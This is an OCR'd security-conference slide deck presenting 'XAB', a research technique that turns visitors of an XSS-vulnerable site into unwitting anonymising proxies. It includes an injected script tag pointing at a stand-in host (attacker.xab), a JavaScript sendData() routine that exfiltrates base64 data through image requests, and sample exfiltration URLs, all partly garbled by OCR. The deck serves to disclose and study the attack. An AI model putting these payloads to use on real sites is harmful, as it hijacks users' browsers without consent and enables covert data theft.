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How did we get here? 

The beginning large-scale threats 

Firewall. "Thanks, network guys" - some bad guy 

Browser is the new old battleground 
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Cross Site Scripting Speed Lesson 

• Lack of input validation / output encoding 

• Stored vs. Reflected 

• Nobody paid attention 

• Has a future - to remain the top web attack in 
2019? 
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Background 

The goal: retrieve Web content anonymously 
Comparison to onion routing 

-Volunteering hosts vs. volunteered hosts 
-Tor, the Einstein of anonymity 

Combining unrelated ideas 
-Cross Site Scripting 
-Anonymity 
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Background 



Simplistic design: 

-Attacker exploits vulnerable site with initial payload 

-Victims/Participants receive payload (HTML injection attack) 
and identify new target URL to request 

- Participants retrieve target content and send back to 
attacker 

Some very serious problems with this design 
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Technical Difficulties 

Browsers and cross domain access 

- Browser security control: content in domain A cannot access 
content in domain B (with minor, unhelpful exceptions) 

-Initial payload exists in domain A... the attacker's desired 
content lives in domain B 

-Workarounds: things you may already know 

• DNS "rebinding" attack 

• Proxy 

• Random or one-off browser bugs 
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More Technical Difficulties 

Non-text content 

-Images, audio, video, etc. are not treated the same as HTML 
text and markup 

-JavaScript: can edit image attributes 

-JavaScript limitation: cannot access image content/bytes 

-Workarounds: 

• Random or one off browser bugs 

• Some very cool server-side functionality, running at the proxy 
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Even More Technical Difficulties 

HTTP verbs other than 'GET' 

- Easy to implement with a proxy 

- Use POST forwarder (reformat GET as POST) 

Finding the attacker's server from a victim 

- Dynamic DNS 

- Long-term dynamic IP from ISP 

-Q: Doesn't this unmask the attacker's host? 
-Free web hosting (w/ perl) sites 
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Whiskey Tango Foxtrot? 

Stateless components 

- Multiple, stateless HTTP requests 

- Out of order requests 

Browser multithreading 

Inconsistent browser implementations 

- Maximum URL request size 

- Unknown problems with Safari 
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Design 



Components 

- XABAtt acker : Proxy Web server hosting main perl code 
(xabattacker.pl) and Target queue 

- HTTProxAB : Attacker's interface to XABAttacker for queue 
updating and response data viewing 

- VulnerableSite : Web server that is vulnerable to HTML 
injection and serves initial payload to victims/participants 

- Participant : any user that receives the initial payload stored 
at VulnerableSite 

- CDProxy : Proxy Web server scripts (cdproxy.pl) used to 
fetch target content and return data to Participant 

- Target : any resource the attacker wishes to make 
anonymously 
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Design 



Instructions to implement XAB 

1. Attacker uploads initial XAB payload 

2. Participant visits Vulnerable Site and parses 
HTML, which requests additional script from 
XABAttacker 

3. XABAttacker sends second payload to 
Participant; this payload includes: 

a) CDProxy location 

b) Target URL(s) to be retrieved 

4. Participant makes another script request to 
CDProxy with Target 






<(FMRM» 



event 



Design 

Instructions to implement XAB / 

5. CDProxy requests content from Target -j 

6. Target returns content W 

7. CDProxy encodes content as string and sendsl 
script that includes: 3 

a) Code to send data back to XABAttacker ) 

b) Data string (encoded version of Target contents) 

8. Participant forwards data to XABAttacker 

9. Attacker browses content 
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Design 

• Two modes of operation (Step Zero) 

-Standard, batch retrieval of data 

• Offline mode 

• Slower/smaller XAB networks 

• Reflected XSS 

-Slick, seamless attacker browser HTTP proxy 

• Online mode 

• Faster/larger XAB networks 

• Persistent XSS 
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XAB Implementation Example 



Vulnerable 
Site 



Vulnerable 
Site 



Vulnerable 
Site 































Target 
Site 




Target 
Site 




Target 

Site 




Target 
Site 




Target 
Site 




Target 
Site 























































CD 
Proxy 




CD 

Proxy 




CD 
Proxy 






Vulnerable 
Site 




















































Victim 




Victim 




Victim 






Vulnerable 
Site 




































• 


























XAB 
Attacker 




XAB 
Attacker 




XAB 
Attacker 








Vulnerable 
SJte 




















m 























* 






Attacker 




Attacker 




Attacker 


Attacker 




Attacker 


,.•• 


Attacker 



























«FMRM» 



event 



XAB Implementation Example 
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XAB Implementation Example 
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HTTProxAB Process Flow - Initial 

0.0 Listens on pre-defined IP and port 

0.1 Accepts incoming HTTP request from 
attacker 

0.2 Inserts request into queue file: 

request ID #, HTTP method, URI 



event 



«FMRM» 



event 



Human Process Flow 

1.0 Attacker uploads initial payload to VulnSite j 

2.0 Participant browses VulnSite, receives 1 
Attacker's payload \ 
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XABAttacker Flow - New Payload 

3.0 Receives payload request from Participant 

3.1 Access internal queue file, retrieve 
request ID, method, URI 

3.2 Removes request from queue 

3.3 Respond to client with JavaScript setting 
request ID, target URI and CDProxy URL 

3.4 Sets JavaScript function to handle 
response splitting 

3.5 Gives Participant new JavaScript include 
with URI set to item extracted from queue 
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Cross Domain Proxy Flow 

4.0 Receives target URL from Participant 
browser 

5.0 Makes request to Target 

6.0 Receives response from Target 

6.1 Base64 encodes retrieved URI 

7.0 Makes call to pre-sent sendData() with 
base64 encoded data 
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XABAttacker Flow - Accept Data 

8.0 Receives incoming img's from Participant / 
8.0.1 Request #, Seq #, Max #, Base64 data 1 

8.1 Writes data to file with format: request#- \l 
sequence#-max# A 

8.2 Responds to Participant with lxl gif \ 

8.3 Combines chunks, base64 decodes and 
places file in dump directory 
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HTTProxAB Flow - Presentation 

9.0 Scans datadump dir for request ID file 
until timeout 

9.1 If file request ID exists, determine type, 
send to browser. 

9.2 Attacker views web page 
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Victim/JavaScript Code A_ A Sf | 


• Initial payload delivered by vulnerable / 9 


Site (Step 2) \ 1 XABAttacker 1 


<script src=http://www. attacker. xab/cgi-bin/ 1/ 1 \ 
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Code Summary 

• Delivery to XABAttacker (step 8) 

function sendData ( data ) { 

var maxdatalen = 2000 - baseurl . length; 

s = Math. ceil ( data. length/maxdatalen) ; 
vcii x-ux-cij-stiysstr = totalsegs+ ' ' ; 

var head = document .getElementsByTagName( ' head' ) .item(0 ) ; 
var newlmage = new Array(); 
var secstr; 
for(i=0; i < totalsegs; i++){ 

newlmage[i] = document .createElement ( ' img ') ; 
secstr = i+ ' ' ; 

iage[i].src = baseurl+ ' &t= ' +totalsegsstr 
+ ' &n= ' +secstr+ ' &d= ' 
+data . substring ( ( i ) *maxdatalen , 

Math.min( ( i+1 ) *maxdatalen, data. length) ) ; 
newlmage[i] .type = ' text/ javascript ' ; 
newlmage[i] .name = ' sendscript ' +sessionid+secstr; 
newlmaqer il .id = ' sendscript ' +sessionid+secstr; 
wlmage [ i ] ) ; 
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sendData() img sre Request Parameters 

i: Target URI request identifier 

t: Total number of data segments (# requests) 

n: Data segment sequence number 

d: Data segment (actual base64 encoded data) 

- data.substring(i*maxdatalen, 
Math.min((i+l)*maxdatalen, data. length)); 
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sendData() img sre Request Example 

<img src= http://www.attacker.xab/cgi-bin/ 
xabattacker.pl?i = 12&s=l&t=3&d=ZGVjb2RIIG> 



<img src= http://www.attacker.xab/cgi-bin/ 
xabattacker.pl?i = 12&s=3&t=3&d=mVIIGJIZXI=> 

<img src= http://www.attacker.xab/cgi-bin/ 
xabattacker.pl?i = 12&s=2&t=3&d=llIGZvciBmc> 
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Demo Environment Architecture 



Host OS 



Victim Client 
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Attacker Client 



Website vulnerable to 
HTML injection attack 



Website with content 
desired by attacker 



[Virtual Machine] 



www.vulnsite.xab 



Firewall 
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www.attacker.xab 
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www.target.xab 
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www.freehost.xab 

Free cgi hosting 
server 
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Weaknesses 



Registering XABAttacker and CDProxy for public 

access 

-Common techniques to hide/mask a host 

Run XABAttacker and CDProxy on same host 

No security in XAB 
-Malicious Victims 

Cutting through corporate network security 
controls, like firewalls 

Incomplete transfers 

And many others... 
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On the shoulders of giants... 


Flick f 


) Jeff 


/ AJAX Cross Domain 
/ Bart Van der Donck 


Tor ^\ 

Lots of people \ 


/ XSSProxy 
/ Anton Rager 


XSSShell,XSSTunnel \ 
Ferruh Mavituna \ 
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Questions 

• Q: Why doesn't it have a cool logo? 

- A: I have a day job 

• Q: Why "Cross Site Scripting" instead of "HTML injection"? 

- A: Because "XAB" looks and sounds cooler than "HAB" 

• Q: Why is your company's name FYRM? 

- A: Hangover + faulty spellcheck 

• Q: Where can I get the latest & greatest? 

- A: FYRM website: www.fyrmassociates.com 




Matthew Flick 
matt.flick@fyrmassociates.com 


Jeff Yestrumskas 
jeff@yestrumskas.com 


fi 


www.fyrmassociates.com 36 



